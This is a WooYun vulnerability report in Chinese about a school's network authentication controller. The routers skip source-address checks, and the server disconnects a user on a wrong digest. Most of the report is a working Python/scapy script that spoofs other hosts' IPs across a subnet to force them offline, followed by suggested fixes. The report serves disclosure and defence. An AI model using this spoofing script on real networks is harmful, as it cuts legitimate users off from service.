乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-03: 细节已通知厂商并且等待厂商处理中 2015-10-13: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放(绿盟科技、唐朝安全巡航) 2015-12-07: 细节向核心白帽子及相关领域专家公开 2015-12-17: 细节向普通白帽子公开 2015-12-27: 细节向实习白帽子公开 2016-01-11: 细节向公众公开
学校的网络架构和出校控制器存在漏洞,有存在拒绝服务攻击的风险
学校出校控制器的握手流程如下图所示:首先机器发出请求数据包,接下来服务器返回一个key,接下来本机再根据key计算出摘要,最后再返回一个认证结果。 但是学校最关键的问题在于 1、学校的路由器不做源地址认证 2、服务器收到错误的用户名和密码即进行掉线 所以A可以伪造任何B机器ip地址向**.**.**.**这个服务器发起请求,虽然伪造包的机器A收不到服务器返回的key,但是伪造包的机器A可以继续发送一个错误的认证摘要,这样就直接导致B机器掉线。通过自己机器试验,该方法测试有效。Python脚本见附件。
Python代码
import socket,timeimport hashlib,osfrom scapy import *from scapy.all import *username='XXXXXXXXXX'password='XXXXXXXXXX'server='**.**.**.**'print('IP Client Crack')print('........................')print('Sending Handshake Packet...')addr=(server,5300)liveaddr=(server,5301)livekey=0sl=socket.socket(socket.AF_INET,socket.SOCK_DGRAM)temple=bytearray([0x82,0x23,0x21,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x0e,0x00,0x00, 0x00,0x39,0x67,0x64,0x74,0x34,0x33,0x37, 0x34,0x35,0x77,0x72,0x77,0x71,0x72,0x1e, 0x00,0x00,0x00,0xFF,0x74,0x34,0x33,0x37, 0x35,0x42,0x38,0x32,0x35,0x37,0x44,0x44, 0x31,0x35,0x30,0x45,0xFF,0x44,0x37,0x36, 0x44,0x31,0x35,0x46,0x33,0x35,0x46,0x30, 0x44,0x11,0x00,0x00,0x00,0x31,0x31,0x3a, 0x32,0x32,0x3a,0x33,0x33,0x3a,0x34,0x34, 0x3a,0x35,0x35,0x3a,0x36,0x36,0x2d,0x1f, 0xd6,0x03,0xcc,0xf2,0x24,0x00,0x0a,0x00, 0x00,0x00,0x71,0x77,0x65,0x72,0x74,0x79, 0x75,0x69,0x6f,0x70])livepack=bytearray(500)def send_handshake(dip): global livekey s=socket.socket(socket.AF_INET,socket.SOCK_DGRAM) s.connect(addr) pack_send=bytearray(300) for i in range(0,300): pack_send[i]=0x00 pack_send[0]=0x82;pack_send[1]=0x23;pack_send[2]=0x1f pack_send[11]=len(username) userlen=len(username) tail=bytearray([0x0b,0x00,0x00,0x00,0x21,0x40,0x23,0x24,0x25,0x25,0x5e,0x26,0x2a,0x28,0x29,0x07,0x00,0x00,0x00,0x71,0x77,0x65,0x72,0x74,0x79,0x75,0x39,0x30,0x00,0x00,0x01,0x00,0x00,0x00,0x06,0x00,0x00,0x00,0x41,0x53,0x44,0x46,0x47,0x48]) for i in range(0,userlen): pack_send[15+i]=ord(username[i])-10; for i in range(0,44): pack_send[15+userlen+i]=tail[i]; fakepack=struct.pack('300B',*pack_send) print(fakepack) pkt1=IP(src=dip, dst='**.**.**.**')/UDP(sport=12345,dport=5300)/fakepack send(pkt1) print('Receiving key packet...') calckey=2323; src=str(calckey)+password src=src.encode('utf-8') md51=hashlib.md5(src).hexdigest().upper() md52=md51[0:5]+username md52=md52.encode('utf-8') md53=hashlib.md5(md52).hexdigest().upper() md53=md53[0:30] md53=md53.encode('utf-8') md53=bytearray(md53) pass_pack=bytearray(300) for i in range(0,len(temple)):pass_pack[i]=temple[i] for i in range(0,30):pass_pack[i+33]=md53[i] fakepack2=struct.pack('300B',*pass_pack) pkt2=IP(src=dip, dst='**.**.**.**')/UDP(sport=12345,dport=5300)/fakepack2 time.sleep(0.5) send(pkt2) print(dip+'attack over') if __name__=="__main__": for i in range(0,62): dip='172.16.00.'+str(i) #dip='**.**.**.**' send_handshake(dip)
路由器对源地址不作校验,所以发出错误的用户名和密码可以直接导致断网
1、路由器全部加上源地址认证(工作量比较大)2、服务器修改策略,需要认证成功后才记录已经发出的key,作为后期心跳包校验的依据,同时单纯的密码错误不会掉线(工作量最小) 3、再返回认证摘要时,需要附带0x20的key,如果与0x20发出的key不一致则忽略该包(需要更新软件)4、出校认证一律采用https网页认证
危害等级:无影响厂商忽略
忽略时间:2016-01-11 15:32
漏洞Rank:15 (WooYun评价)
暂无